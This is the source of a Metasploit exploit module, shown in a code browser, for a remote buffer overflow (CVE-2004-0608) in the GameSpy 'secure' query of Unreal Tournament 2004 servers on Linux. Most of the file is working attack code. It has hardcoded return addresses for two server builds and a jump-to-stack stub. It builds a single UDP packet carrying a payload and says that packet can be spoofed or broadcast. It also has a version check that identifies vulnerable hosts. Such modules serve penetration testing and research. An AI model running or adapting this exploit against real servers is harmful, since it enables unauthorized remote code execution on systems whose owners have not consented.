root / modules / exploits / linux / games / ut2004_secure.rb @ master
History | View | Annotate | Download (2.8 kB)
| 1 |
##
|
|---|---|
| 2 |
# $Id$
|
| 3 |
##
|
| 4 |
|
| 5 |
##
|
| 6 |
# This file is part of the Metasploit Framework and may be subject to
|
| 7 |
# redistribution and commercial restrictions. Please see the Metasploit
|
| 8 |
# Framework web site for more information on licensing and terms of use.
|
| 9 |
# http://metasploit.com/framework/
|
| 10 |
##
|
| 11 |
|
| 12 |
require 'msf/core'
|
| 13 |
|
| 14 |
class Metasploit3 < Msf::Exploit::Remote |
| 15 |
Rank = GoodRanking |
| 16 |
|
| 17 |
include Msf::Exploit::Remote::Udp |
| 18 |
|
| 19 |
def initialize(info = {}) |
| 20 |
super(update_info(info,
|
| 21 |
'Name' => 'Unreal Tournament 2004 "secure" Overflow (Linux)', |
| 22 |
'Description' => %q{ |
| 23 |
This is an exploit for the GameSpy secure query in |
| 24 |
the Unreal Engine. |
| 25 |
|
| 26 |
This exploit only requires one UDP packet, which can |
| 27 |
be both spoofed and sent to a broadcast address. |
| 28 |
Usually, the GameSpy query server listens on port 7787, |
| 29 |
but you can manually specify the port as well. |
| 30 |
|
| 31 |
The RunServer.sh script will automatically restart the |
| 32 |
server upon a crash, giving us the ability to |
| 33 |
bruteforce the service and exploit it multiple |
| 34 |
times. |
| 35 |
},
|
| 36 |
'Author' => [ 'onetwo' ], |
| 37 |
'License' => BSD_LICENSE, |
| 38 |
'Version' => '$Revision$', |
| 39 |
'References' =>
|
| 40 |
[ |
| 41 |
[ 'CVE', '2004-0608'], |
| 42 |
[ 'OSVDB', '7217'], |
| 43 |
[ 'BID', '10570'], |
| 44 |
|
| 45 |
], |
| 46 |
'Privileged' => true, |
| 47 |
'Payload' =>
|
| 48 |
{
|
| 49 |
'Space' => 512, |
| 50 |
'BadChars' => "\x5c\x00", |
| 51 |
|
| 52 |
}, |
| 53 |
'Platform' => 'linux', |
| 54 |
'Targets' =>
|
| 55 |
[ |
| 56 |
['UT2004 Linux Build 3120', { 'Rets' => [ 0x0884a33b, 0x08963460 ] }], #JMP ESP , (free/realloc) BSS pointer |
| 57 |
['UT2004 Linux Build 3186', { 'Rets' => [ 0x088c632f, 0x089eb2f0 ] }], |
| 58 |
], |
| 59 |
'DisclosureDate' => 'Jun 18 2004')) |
| 60 |
|
| 61 |
register_options( |
| 62 |
[ |
| 63 |
Opt::RPORT(7787) |
| 64 |
], self.class)
|
| 65 |
end
|
| 66 |
|
| 67 |
def exploit |
| 68 |
connect_udp |
| 69 |
|
| 70 |
buf = make_nops(1024)
|
| 71 |
buf[24, 4] = [target['Rets'][1]].pack('V') |
| 72 |
buf[44, 4] = [target['Rets'][0]].pack('V') |
| 73 |
buf[56, 4] = [target['Rets'][1]].pack('V') |
| 74 |
buf[48, 6] = "\x8d\x64\x24\x0c\xff\xe4" #LEA/JMP |
| 75 |
|
| 76 |
buf[0, 8] = "\\secure\\" |
| 77 |
buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded |
| 78 |
|
| 79 |
udp_sock.put(buf) |
| 80 |
|
| 81 |
handler |
| 82 |
disconnect_udp |
| 83 |
end
|
| 84 |
|
| 85 |
def ut_version |
| 86 |
connect_udp |
| 87 |
udp_sock.put("\\basic\\")
|
| 88 |
res = udp_sock.recvfrom(8192)
|
| 89 |
disconnect_udp |
| 90 |
|
| 91 |
if (res and (m=res.match(/\\gamever\\([0-9]{1,5})/))) |
| 92 |
return m[1] |
| 93 |
end
|
| 94 |
|
| 95 |
return
|
| 96 |
end
|
| 97 |
|
| 98 |
def check |
| 99 |
vers = ut_version |
| 100 |
|
| 101 |
if (not vers) |
| 102 |
print_status("Could not detect Unreal Tournament Server")
|
| 103 |
return
|
| 104 |
end
|
| 105 |
|
| 106 |
print_status("Detected Unreal Tournament Server Version: #{vers}")
|
| 107 |
if (vers =~ /^(3120|3186|3204)$/) |
| 108 |
print_status("This system appears to be exploitable")
|
| 109 |
return Exploit::CheckCode::Appears |
| 110 |
end
|
| 111 |
|
| 112 |
|
| 113 |
if (vers =~ /^(2...)$/) |
| 114 |
print_status("This system appears to be running UT2003")
|
| 115 |
return Exploit::CheckCode::Detected |
| 116 |
end
|
| 117 |
|
| 118 |
print_status("This system appears to be patched")
|
| 119 |
return Exploit::CheckCode::Safe |
| 120 |
end
|
| 121 |
|
| 122 |
end
|